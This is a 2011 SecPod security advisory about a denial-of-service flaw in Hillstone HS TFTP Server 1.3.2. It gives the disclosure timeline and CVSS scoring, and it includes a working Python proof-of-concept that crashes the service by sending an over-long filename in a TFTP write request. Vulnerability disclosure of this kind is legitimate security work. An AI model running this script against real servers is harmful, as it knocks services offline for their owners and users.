Hillstone Software HS TFTP Server Denial Of Service

`##############################################################################  
# Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability  
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)  
# Vendor : http://www.hillstone-software.com/hs_tftp_details.htm  
# Advisory : http://secpod.org/blog/?p=419  
# http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt  
# http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py  
# Version : Hillstone Software HS TFTP 1.3.2  
# Date : 02/12/2011  
##############################################################################  
  
SecPod ID: 1031 21/09/2011 Issue Discovered  
04/10/2011 Vendor Notified  
No Response from Vendor  
02/12/2011 Advisory Released  
  
  
Class: Denial Of Service Severity: Medium  
  
  
Overview:  
---------  
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of  
service vulnerability.  
  
  
Technical Description:  
----------------------  
The vulnerability is caused due to improper validation of WRITE/READ Request  
Parameter containing long file name, which allows remote attackers to crash  
the service.  
  
  
Impact:  
--------  
Successful exploitation could allow an attacker to cause denial of service  
condition.  
  
  
Affected Software:  
------------------  
Hillstone Software HS TFTP 1.3.2  
  
  
Tested on:  
-----------  
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.  
Older versions might be affected.  
  
  
References:  
-----------  
http://secpod.org/blog/?p=419  
http://www.hillstone-software.com/index.htm  
http://www.hillstone-software.com/hs_tftp_details.htm  
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt  
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py  
  
  
Proof of Concept:  
----------------  
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py  
  
  
Solution:  
----------  
Not available  
  
  
Risk Factor:  
-------------  
CVSS Score Report:  
ACCESS_VECTOR = NETWORK  
ACCESS_COMPLEXITY = LOW  
AUTHENTICATION = NOT_REQUIRED  
CONFIDENTIALITY_IMPACT = NONE  
INTEGRITY_IMPACT = NONE  
AVAILABILITY_IMPACT = PARTIAL  
EXPLOITABILITY = PROOF_OF_CONCEPT  
REMEDIATION_LEVEL = UNAVAILABLE  
REPORT_CONFIDENCE = CONFIRMED  
CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)  
Risk factor = Medium  
  
  
POC :  
======  
  
import socket,sys,time  
  
port = 69  
target = raw_input("Enter host/target ip address: ")  
  
if not target:  
print "Host/Target IP Address is not specified"  
sys.exit(1)  
  
print "you entered ", target  
  
try:  
socket.inet_aton(target)  
except socket.error:  
print "Invalid IP address found ..."  
sys.exit(1)  
  
try:  
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:  
print "socket() failed"  
sys.exit(1)  
  
## File name >= 222 length leads to crash  
exploit = "\x90" * 2222  
  
mode = "binary"  
print "File name WRITE/READ crash"  
  
## WRITE command = \x00\x02  
data = "\x00\x02" + exploit + "\0" + mode + "\0"  
  
## READ command = \x00\x01  
## data = "\x00\x01" + exploit + "\0" + mode + "\0"  
  
sock.sendto(data, (target, port))  
time.sleep(2)  
sock.close()  
try:  
sock.connect()  
except:  
print "Remote TFTP server port is down..."  
sys.exit(1)  
  
`